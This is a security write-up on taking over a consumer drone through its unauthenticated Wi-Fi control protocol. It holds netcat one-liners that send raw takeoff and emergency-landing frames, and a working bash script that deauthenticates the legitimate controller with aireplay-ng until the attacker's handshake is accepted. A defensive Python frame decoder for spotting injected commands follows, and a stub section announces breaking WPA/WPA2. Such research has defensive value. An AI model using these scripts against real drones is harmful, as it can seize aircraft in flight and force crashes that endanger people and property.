Case 1. Default Setting, without any authentication and encryption
steps
video demo and slides
The drone accepts commands on port 54321/udp, but that port is only opened after authenticating over port 44444/tcp.
SDK: https://developer.parrot.com/docs/SDK3/
Drone movement control packets (to drone port 54321/udp)
Header:
  u8  frame type
  u8  frame id
  u8  sequence num
  u32 packet length
Content:
  u8* data buffer
    u8  1 (ARCOMMANDS_ID_PROJECT_ARDRONE3)
    u8  0 (ARCOMMANDS_ID_ARDRONE3_CLASS_PILOTING)
    u16 3 (ARCOMMANDS_ID_ARDRONE3_PILOTING_CMD_LANDING)
Example (landing command, hex):
02 0a 00 0b 00 00 00 01 00 03 00
Example usage:
# handshake over 44444/tcp, which opens 54321/udp for commands
echo '{ "d2c_port":43210, "controller_type":"qwer","controller_name":"asdf" }' | nc 192.168.42.1 44444
sleep 1
if [ -z "$1" ]; then
    echo "emergency landing"
    echo -e -n "\x02\x0a\x01\x0b\x0\x0\x0\x1\x0\x4\x0" | nc -u -w 1 192.168.42.1 54321 # emergency landing (cmd 4)
else
    echo "taking off"
    echo -e -n "\x02\x0a\x01\x0b\x0\x0\x0\x1\x0\x1\x0" | nc -u -w 1 192.168.42.1 54321 # takeoff (cmd 1)
fi
Awful bash script that does this somewhat automatically after connecting to the drone's wifi network. The following must be defined manually:
CHANNEL (channel the drone is operating on; can be found with airodump-ng; changes randomly on drone boot)
BSSID (MAC addr of the drone)
CLIENT (MAC addr of the controller)
INTERFACE (name of the interface created by airmon-ng)
#!/bin/bash
# Handshake JSON sent to 44444/tcp (same as in the example above).
COMMAND='{ "d2c_port":43210, "controller_type":"qwer","controller_name":"asdf" }'
CHANNEL=8
BSSID=a0:14:3d:fb:f7:bc    # drone MAC addr
CLIENT=a0:14:3d:fb:fa:08   # controller MAC addr
INTERFACE=wlan1mon
DEAUTH_SENT=false
I=0

while true; do
    RESULT=$(echo "$COMMAND" | nc 192.168.42.1 44444)
    if echo "$RESULT" | grep -q '"status": -3999'; then
        # handshake refused: act on the first refusal and then every 5th one
        if [[ $DEAUTH_SENT = false ]] || [[ $I -eq 5 ]]; then
            echo sending DEAUTH
            airodump-ng "$INTERFACE" --bssid "$BSSID" -c "$CHANNEL" &
            PID=$!
            #sleep 0.2
            aireplay-ng --deauth 2 -a "$BSSID" -c "$CLIENT" "$INTERFACE"
            DEAUTH_SENT=true
            kill -2 "$PID"
            #sleep 0.2
            I=0
        fi
        printf "."
        I=$((I + 1))
    elif echo "$RESULT" | grep -q '"status": 0'; then
        echo "WINRAR"
        export DISPLAY=:0
        python drone_land.py    # external script, not shown on this page
        sleep 10000
    else
        echo
        echo "UNHANDLED RESULT $RESULT"
    fi
    sleep 0.1
done
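Added example, not code from this page or from Parrot's SDK: a Python decoder for the 54321/udp frame layout described above. It validates the length field (assumed little-endian, as the sample bytes 0b 00 00 00 = 11 show), names only the piloting command ids that appear on this page, and flags sequence-number anomalies, which is how frames from a second sender, like the ones the script above emits, stand out in a capture of the controller link.

```python
import struct

# Layout from the page: 7-byte header, then the command. The u32 length is little-endian and
# counts the header too (0x0b = 11 for the landing frame shown above).
HEADER = struct.Struct("<BBBI")   # frame type, frame id, sequence number, total frame length
COMMAND = struct.Struct("<BBH")   # project id, class id, command id
ARCOMMANDS_ID_PROJECT_ARDRONE3 = 1
ARCOMMANDS_ID_ARDRONE3_CLASS_PILOTING = 0
# Piloting command ids used on this page: 1 takeoff and 4 emergency (script), 3 landing (layout).
PILOTING_CMDS = {1: "TAKEOFF", 3: "LANDING", 4: "EMERGENCY"}

def parse_frame(datagram):
    """Return (frame_type, frame_id, seq, payload) for one 54321/udp datagram, validating the length."""
    if len(datagram) < HEADER.size:
        raise ValueError(f"truncated header: {len(datagram)} bytes")
    ftype, fid, seq, length = HEADER.unpack_from(datagram)
    if length < HEADER.size or length > len(datagram):
        raise ValueError(f"length field {length} inconsistent with {len(datagram)}-byte datagram")
    return ftype, fid, seq, datagram[HEADER.size:length]

def decode_command(payload):
    """Name the ARCommand in a payload; ids not on this page are reported numerically, not guessed."""
    if len(payload) < COMMAND.size:
        raise ValueError(f"payload too short for a command: {payload.hex()}")
    project, cls, cmd = COMMAND.unpack_from(payload)
    if project == ARCOMMANDS_ID_PROJECT_ARDRONE3 and cls == ARCOMMANDS_ID_ARDRONE3_CLASS_PILOTING:
        return "ARDRONE3.PILOTING." + PILOTING_CMDS.get(cmd, f"CMD_{cmd}")
    return f"project={project} class={cls} cmd={cmd}"

def audit(datagrams):
    """Decode captured control datagrams in order. A repeated or skipped sequence number is
    flagged: frames from a second sender do not continue the real controller's counter."""
    report, last_seq = [], None
    for raw in datagrams:
        _, _, seq, payload = parse_frame(raw)
        note = ""
        if last_seq is not None and seq != (last_seq + 1) % 256:
            note = f" [seq anomaly {last_seq}->{seq}]"
        last_seq = seq
        report.append(f"seq={seq} {decode_command(payload)}{note}")
    return report

# Constructed sample: the landing frame from the page, then the two frames the script sends.
SAMPLE = [bytes.fromhex("02 0a 00 0b 00 00 00 01 00 03 00"),
          bytes.fromhex("02 0a 01 0b 00 00 00 01 00 01 00"),
          bytes.fromhex("02 0a 01 0b 00 00 00 01 00 04 00")]

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE)))
```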
Case 2. Configure Encryption (WPA/WPA2)
steps
Let us see how we can break them.
video demo